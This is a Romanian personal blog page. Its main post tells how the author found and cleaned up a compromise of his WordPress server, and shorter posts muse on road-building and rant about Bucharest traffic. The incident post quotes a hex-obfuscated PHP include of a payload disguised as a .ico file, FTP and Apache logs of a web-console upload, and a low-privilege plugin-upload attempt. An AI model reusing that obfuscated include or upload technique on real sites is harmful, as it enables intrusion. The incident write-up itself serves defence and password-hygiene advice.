Incercam sa-mi imaginez si sa compar cum e acum versus cum era acum cateva sute/mii de ani, cand inca nu existau guverne, parlament, presedinti, administratie, ministere si etc (sau cel putin nu existau ca in forma curenta).

Mai concret, ma gandeam la o anumita perioada in istoria omenirii cand s-au construit drumuri. Sau, mai precis, de ce s-au construit sau imbunatatit drumurile.

Ce-am gasit a fost in felul urmator.

La un moment dat in trecut oamenii mureau de foame, pentru ca nu aveau de mancare. Se traia pana pe la 35-40 de ani. Dupa aceea s-a descoperit porumbul si alte grane, s-a inceput cultivarea lui in masa, agricultura era in floare, oamenii nu mai mureau de foame.
Cand oamenii nu mai mureau de foame, de fericire, au inceput sa faca copii. Multi copii.
Cateva sute de ani mai tarziu s-au trezit ca iar mureau de foame, pentru ca erau prea multi, si aveau nevoie de mai multa mancare, si nu puteau transporta granele de unde se cultivau pana in comunitati rapid si in cantitati mai mari decat de obicei.

Ceva foarte interesant s-a intamplat aici. Ceva ce in ziua de azi nu se mai poate intampla, si e un lucru foarte rau ca nu se mai poate intampla.

Pe atunci nu existau joburi, oamenii nu erau obligati sa munceasca toata ziua, si aveau destul timp liber.
Avand timp liber, s-au apucat sa construiasca (sau ma rog, sa imbunatateasca) drumuri, cu scopul de-a putea transporta mai rapid si in cantitati mai mari granele. Ca sa nu moara de foame.

Si s-au pus sa largeasca drumurile, si din drumuri de pamant au inceput sa sparga pietre si sa-l pietruiasca. Dupa aceea au inceput sa construiasca utilaje mai mari, carute mai mari.

Deci evolutia noastra e bazata pe 2 lucruri:

  1. Frica de-a muri de foame.
  2. Timp mult liber investit in ajutorul comunitatii.

Si acum inapoi in prezent.

Nu mai avem niciunul din cele 2 lucruri magice, ce ne-a ajutat in trecut in evolutia noastra.

Frica de-a muri de foame nu mai exista, cel putin pentru 99% din populatie (vorbesc de moarte la propriu de foame, nu de saracie ca nu-ti permiti nu stiu ce tip de carne, dar ai bani de-o felie de paine presarata cu zahar).

Timp liber, sa fim seriosi, dupa 9 ore la munca + un caz mai extrem in care faci 2 ore pe drum (dus-intors) rezulta in 11 ore de munca, la care se adauga ba mancarea, ba nevoi fiziologice, ba gatit, si observi ca nu mai ramai decat cu cateva zeci de minute. Si alea le oferi de obicei familiei. Te joci cu copilul, te iubesti cu partenerul, si gata, somn. Si se repeta, in fiecare zi, pana imbatranim.

Teoretic, avem noroc, ca exista fel si fel de organizatii, firme, ministere, etc, ce se ocupa cu aceste lucruri: sa repare/imbunatateasca drumurile, sa creeze drumuri noi, cladiri noi, si orice altceva ce putem da vina pe cineva pentru ca nu-si face treaba.

E rau ce spun, dar e normal sa nu-si faca treaba. Pentru ca nu e treaba lor, ci a noastra. Si noi ca specie suntem lenesi, muncim pe branci doar cand suntem in pericol de-a muri (de foame, de ceva). Asa sunt si acele firme, ministere, etc. Lenese.

“Dar de ce sa muncesc eu si sa bag bani in drumuri? Ce, nu se poate deplasa din A in B comunitatea? Ce, moare cineva de foame? Ce, exista vreun pericol? Si ce daca se face 1 kilometru in 1 ora in orase, nu moare nimeni de foame, toata lumea e in siguranta, stau si eu la caldurica unde mi-e bine. Ah, imi vin bani cu traista si sunt obligat de altii sa fac ceva cu ei? Pai ce sa fac, doar nu ma apuc sa fac drumuri de nebun. Sa le dau foc? Ce naiba sa fac cu atatia bani? Eh, lasa ca ma descurc eu, mai bag la sosete, mai ascund, si zic ca am facut ceva cu ei.”

Si dupa aia venim noi, nebunii, ce ne-am inmultit ca dementii, si urlam in gura mare ca vai, nu avem conditii. Dar nici unul din noi nu realizeaza cum stau lucrurile. Si lucrurile stau ca mai sus: doar noi, in mod direct, putem face ceva.

Da, stiu, nu mai e ca pe vremuri, cand daca vroiai un drum mai bun, te duceai singur sa ti-l faci. Acum nu ai voie sa intervii asupra unui drum, ca exista un minister sau cineva care se ocupa de acel lucru, si doar el poate face ceva.
Si e de rau. E de foarte rau. Credeti-ma ca NOI avem puterea. NOI in mod direct. Doar NOI putem face ceva, doar DACA vrem. Doar ca in prezent nu mai putem, pentru ca asa am crezut noi ca “evoluam” si ca ne “civilizam” si am creat ministere in trecut, si le-am dat lor puterea de-a administra ORICE. Si nu doar le-am dat lor puterea asta, ci le-am zis sa ne si interzica noua aceste lucruri. Si noi nu mai putem face nimic acum.

Dar dupa cum noi evoluam mereu, si niciodata nu stam pe loc, probabil in viitor lucrurile se vor schimba, vor evolua. Si probabil ca vor disparea acele ministere, si va ajunge din nou in puterea noastra sa facem ce vrem, cand vrem, unde vrem.

Si ca exercitiu de gandire: Realizeaza ca in trecut ORICE vroiai sa se intample puneai mana si faceai, nu cereai. Asa ca data viitoare, in loc sa te vaiti ca pe strada ta e o groapa si dai mereu cu masina in ea, mai degraba ia niste pamant si astup-o. Da, stiu, nu e perfect, dar decat sa ceri, mai bine faci tu. Poate ca vei da un exemplu, si va face la fel si vecinul tau, si vecinul lui, si intr-o zi ce ziceam mai sus va deveni real, si vom putea din nou sa facem ce vrem. Si bine ne va mai fi.

Salut!

Repet ce am scris in titlu:

  • Schimbati-va parolele periodic!
  • Nu folositi aceeasi parola pe mai multe site-uri!
  • Aveti parole diferite dupa gradul de risc!

Am fost hack-uit. In sfarsit as zice!

Zic “in sfarsit” pentru ca acum 10-15 ani cand m-am decis sa folosesc aceeasi parola peste tot, mi-am zis ca “ce poate merge rau?“. Au trecut ani, nimic rau nu s-a intamplat, am zis ca e totul ok.

Doar ca azi mi-am dat seama ca am o linie dubioasa in fiecare index.php de pe server.

  • `@include “\x2fhome\x2fadmi \x6e/web\x2fmflo \x72in.c\x6fm /pu\x62lic_\x68tml /\x74est_\x6aasny\x5fsso /\x6aasny\x5fsso /\x2edfbf\x34896.\x69co”;`
  • Care s-ar transforma intr-un `@include “/home/admin /web/blog.mflorin.com /public_html/test_jasny_sso /jasny_sso /.dfbf4896.ico”;`

Deschid acel fisier .ico (care de fapt avea un cod php in el, dar “criptat” destul de mult), imi dau seama ca ceva naspa s-a intamplat.

Dau vina pe wordpress sau vreo tema ori plugin cu probleme.

Investighez putin si-mi dau seama de prin loguri ca cineva a reusit sa se logheze prin FTP si a uploadat un fisier undeva

  • Din `cat /var/log/vsftpd.log | grep “] OK”` a rezultat o linie “interesanta”: `[admin] OK UPLOAD: Client “5.8.48.72”, “/web/blog.mflorin.com/public_html/logon/lfwxkjn.php”, 67628 bytes, 123.91Kbyte/sec`

Ma uit la fisier, era un fel de webconsole. Zic ca e ok, a fost cumva “direct / de mana” hack-ul, nu gen vreun virus sau ceva (care, in mintea mea, poate face mai mult rau).

Iau IP-ul, il bag in fail2ban si merg mai departe. Zic hai sa ma uit si la logurile de fail2ban. Vad o gramada de brute force-uri pe ssh. Ma uit si la logurile de mysql, la fel. Zic ca nu mai are rost sa bag in lista de ip-uri banate ca sunt prea multe.

Intre timp imi dau seama ca merge greu serverul (lag?). Un htop imi spune ca apache-ul ia 99% din cpu. Wtf?

Ma uit cu un tail -f in logurile de la apache, vad tone de mesaje de genul `42.51.194.16 – – [24/May/2018:21:41:32 +0300] “POST /xmlrpc.php HTTP/1.0” 200 451 “-” “Apache-HttpClient/4.5.2 (Java/1.8.0_151)”` Brute force in wordpress, dar de pe alt ip. Unul era de prin PL, altul de prin China. Ma gandesc ca nu au treaba unul cu altul.

Doar de pe acel IP se facea trafic, il bag in fail2ban, scade load-ul de la 99% la sub 1%. Nice one. Noroc ca se dadea doar de pe 1 IP.

Opresc serviciul de vsftpd, ca oricum nu-l foloseam, fac regula in firewall sa ma pot conecta doar de pe IP-ul meu la ssh, blochez si accesul spre porturile de FTP, mai fac ceva tweak pe ici pe colo.

Intru in WP, si vad pe pagina de Users Online (care iti arata IP-urile userilor, pe ce pagina sunt, si eventual cu ce user sunt logati, daca sunt) ca erau 2 useri logati, eu si inca unul, test.

Ce puii mei? Nu exista nici un test pe blog.

Ma uit in Users, vad ca e un user test creat in 2009 pe adresa de email test@darky14.com. (note: darky14.com era fostul domeniu, care a fost migrat pe acesta).

Incerc sa ma loghez cu username test si password test si wtf?? MERGE!! Soooo stupid! :|

Ma rog, userul avea drepturi doar de Subscriber (deci nu putea face mare chestie (so I thought!))

Ii iau IP-ul. e de China. Intru pe darky14.com, vad ca e ceva in chineza pe el. E o legatura.

Ii dau un `tail /var/log/apache2/domains/blog.mflorin.com.log -n 1000 | grep 163.172.127.238` si uite chestie:

  • 163.172.127.238 – – [24/May/2018:23:14:56 +0300] “GET /wp-login.php HTTP/1.0″ 200 5876 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36”
  • 163.172.127.238 – – [24/May/2018:23:14:57 +0300] “POST /wp-login.php HTTP/1.0″ 302 1452 “http://blog.mflorin.com/wp-login.php” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36”
  • 163.172.127.238 – – [24/May/2018:23:14:58 +0300] “POST /wp-admin/update.php?action=upload-plugin HTTP/1.0″ 500 3190 “http://blog.mflorin.com/wp-admin/theme-install.php?tab=upload” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36”
  • 163.172.127.238 – – [24/May/2018:23:14:58 +0300] “GET /wp-content/uploads/sup_wp.php HTTP/1.0″ 404 82075 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36”
    163.172.127.238 – – [24/May/2018:23:14:58 +0300] “GET /wp-content/uploads/2016/12/sup_wp.php HTTP/1.0″ 404 82211 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36”

Pe scurt, chiar daca nu ai drept de admin, daca esti logat in magnificul wordpress si faci niste POST-uri magice pe wp-admin/update.php, poti uploada ce fisiere vrei tu!.
Da, fie, a dat 500 pe POST si 404 pe GET-urile pe fisiere dupa aia, dar putea fi mai rau!

Fucking awesome!

Intru repede, fac update la WP, intru pe user, schimb parola, schimb email-ul, bag userul in banlist, etc.

Faza dura. WP-ul, cand schimbi parola sau email-ul din backend-ul lor, trimite mail de notificare pe adresa veche.

Ma uit in loguri si vad:

 

Wtf? Tocmai ce i-am trimis omului ce m-a hackuit un mail in care i-am spus ca i-am schimbat parola? Bravo Florin! Bravo.

 

Anyway, omul stia parola de la userul de ftp in plain text.

As spune ca partea funny e ca aceeasi parola era si la mysql si la ssh si in mai multe locuri, dar mi-e sa nu fac mai rau (daca intra chinezul si da translate aici si zice “hai sa incerc si intr-un mysql sau ssh aceeasi parola sa vad ce se intampla”.

 

Din ce vad, in ultimul timp, se incearca din ce in ce mai des brute force. Ori sunt eu luat in vizor, ori chestia asta e mai des intalnita azi decat acum cativa ani in urma.

De-aia e bine ca existe parole diferite la servicii (mysql), ssh sa fie IP based (si KEY based, nu password based), FTP daca nu e folosit, dezactivat, etc.

 

 

Sooooo,

Ca si nota de final….

 

 

 

NEVER EVER EVER EVER PUT THE SAME PASSWORD FOR MULTIPLE SERVICES IN A SERVER!!!!

 

 

Si ca sa nu credeti ca sunt atat de stupid, da, am parole diferite pe nivele de securitate, ceea ce va recomand si voua sa aveti. Poate ca e mega dificil sa aveti cate o parola diferita pentru fiecare cont, dar macar sa aveti 3-4 parole (de la usoara (usor de tastat) la foarte grea (poate ceva mai greu de tastat)) pe nivele de securitate.

Parola de la ING nu o puneti la fel ca cea de la filelist.ro.

Parola cu care va inregistrati pe un site dubios, nu o puneti ca cea de la filelist.ro. Oricine din partea cealalta poate face o baza de date cu combinatii de username + password, si maine va treziti ca nu mai aveti nici un cont (furt de identitate online).

Nah, penibil din partea mea sa spun asta, dar, aveti grija la parole!

Acum ma scuzati, am de schimbat parolele la o gramada de servere si servicii si configi, etc… Hard work :(

Have fun, si daca va duce capul la prostii, ca am pus calea pe server, username-ul, etc… DON’T!

Ah, si inca ceva. Daca renuntati la un domeniu (sau adresa de email), aveti mare mare grija sa nu uitati sa va schimbati adresa de email din cea veche in cea noua prin toate locurile unde ati fi putut s-o folositi (note: sigur veti uita intr-un loc, si se va intoarce impotriva voastra, peste vreo 10 ani asa :)) )

Plecasem de la munca la ora 19 (o ora acceptabila pentru traficul din Bucuresti zic), nici nu apucasem sa ies din parcare ca deja eram blocat. Intru pe Waze, imi zice 45min pentru 3.9 km. Stau vreo 10 min nemiscat, ma supar si ma intorc inapoi in parcare, urc la birou. Poate pe la 20-21 plec si eu de la munca.

O injur un pic pe Firea ca a promis din 2012 ca face pasaj pe sub calea ferata de pe Petricani, ma enervez si-mi zic ca ar fi bine sa plec din tara asta, ca astia de la putere isi bat joc de noi, si eu nu vreau sa accept asa ceva.

*Ca o paranteza, au trecut vreo 30 min de atunci, si INCA se aud trenuri in departare!!!

Intre timp stau si ma gandesc… Oare doar la noi o fi asa? Nu stiu cum e prin alte parti, n-am locuit in afara tarii, in zone bune dpdv IT (unde se gasesc si joburi faine in domeniu), dar incep sa ma gandesc ca se poate sa nu fie mai bine, ba chiar sa fie mai rau.

Aici am 3.9 km pana acasa si le fac in 45 min, ba chiar peste 1 ora in zilele rele (vineri seara?). Dar prin alte parti se poate sa locuiesc la 20 km de munca, si sa le fac in mai bine de 1h (sau poate chiar si 2h).

Note: Fara comentarii ca acesti 3.9 km ii poti face si pe jos, ca in marea majoritate a timpului ii fac in sub 10 min, eu vorbesc acum de momentele alea ciudate cand nu nimeresti ora “potrivita”

Mereu compar Bucuresti cu Galati (de unde am plecat) si incep sa vad din ce in ce mai putine avantaje ale Bucurestiului.

In Galati n-ai de munca, si ce ai is chestii ce nu vrei sa faci. In Bucuresti ai de munca, dar vin la pachet cu niste chestii super super naspa.

Ahh, abia astept viitorul (sper eu apropiat) cand or sa existe din ce in ce mai multe joburi remote, sa pot locui unde vreau eu, si sa am parte si de un job fain.

Dar pana atunci, o injur pe Firea in fiecare fucking zi cand ma duc si ma intorc de la munca, pentru ca e o mincinoasa care promite proiecte si deadline-uri si nu se tine de ele! Nu poti sa spui ca faci ceva si sa nu faci. NU POTI! Nu se poate asa ceva. Ar trebui sa fie pacat capital, sa se pedepseasca cu inchisoarea, dat afara, batjocorit in strada, habar n-am, dar nu se accepta asa ceva.

* Mai bag o linie de cod, mai o muzica, mai o linie aici, trec 50 minute, si INCA se aud trenuri in departare…

In alta ordine de idei, sa nu spuneti ca Dacia nu face masini bune, ca se exporta IN DRACI.
Aproape in fiecare zi in jur de ora 11 trec trenuri de kilometri lungime care transporta Dacii (probabil spre CT, sa fie exportate).

Faza proasta e ca aceste trenuri merg cu 3 km/h si le iau 30 min sa treaca pe acolo. Ba chiar uneori dau si inapoi. Eu chiar cred ca cineva face aceste lucruri sa-si bata joc de noi. Pe bune, altfel nu-mi explic cum poate sa opreasca trenul fix la ora “aia” si fix la trecerea “aia”. Sa opreasca, sa dea putin inapoi, si dupa sa plece mai departe. Pe post de “haa, fraierilor, uitati-va la mine cum fac misto de zeci de mii de oameni. In fiecare zi. haaaa, ce fraieri sunteti…”
Si nu cumva sa treaca la alta ora. La ora 10-11 si la ora 18-19. Cele mai potrivite ore sa plece toate trenurile in acelasi timp, unul dupa altul.

La un moment dat am avut “norocul” sa fiu primul la calea ferata si am si filmat un pic (atasez mai jos filmarea).

Tags:

Zilele trecute un coleg si-a cumparat un telefon cu 6 GB de ram si CPU de 2.5 GHz cu 8 cores. Si ma gandeam ca eu cunosc foarte multe persoane care inca mai au pc-uri cu mai putin de 6 GB ram si poate chiar si CPU mai mic de 2.5 GHz, clar cu mai […]

Google sunt inteligenți. Sau nu. Pe scurt. Google e un motor de căutare. Adică scrii ceva într-un input pe site-ul lor, și ei îți returnează rezultate conform căutării tale. Ca sa facă asta, ei au servicii în spate care non stop caută pe internet, ia fiecare pagină în parte, o scanează și o adaugă într-o […]

Cam asa s-ar traduce pe scurt ce se intampla la Galati cu proiectul “Unda Verde”. Sunt cateva posibilitati de ce sistemul nu merge. Ca si cu logo-ul ANAF de 70 miliarde lei (vechi), care s-ar face in 20 minute, probabil si in cazul asta, e doar o acoperire pentru a se sustrage niste bani dintr-un fond […]

Salut! Ce ciudat e! Ce ciudat se “simte” să scriu aceste rânduri. Îmi tot spun de ani de zile să renunț la acest blog, și să pun un homepage de-ăla static cu “Ăsta-s eu, asta fac, așa mă numesc, asta-mi e poza” și cam atât. Exceptând un articol acum vreo 2 ani, altul acum 3 […]

Citeam pe aici cum că Sony s-a retras din business-ul cu personal computer (mai pe românește: Sony nu mai face calculatoare d-alea vechi cu unitate centrală + monitor + tastatură și mouse) În ultimele 8 trimestre ale anilor (mai exact în ultimii 2-3 ani) toți giganții creatori de pc-uri au încasat scăderi din ce în […]

*Continuarea articolelor “Statul, cel mai mare cămătar!” și “Care-i legătura dintre Casa de asigurări de SĂNĂTATE și banii intrați în contul tău!?“. E ca și cum ar veni mafia la tine la ușă să-ți spună: Vrei să ieși din casă? Atunci dă-mi lunar 16% din veniturile tale, iar eu te voi lăsa să ieși afară […]

În ultimul articol am scris despre faptul că atunci când ai un câștig de 162 lei, ție-ți revin de fapt doar 100 lei. Restul de 62 lei se duc la stat. Asta înseamnă că aproape 40% din câștigurile tale se duc la stat. Dar nu despre asta vreau să vorbesc aici, ci despre legătura dintre […]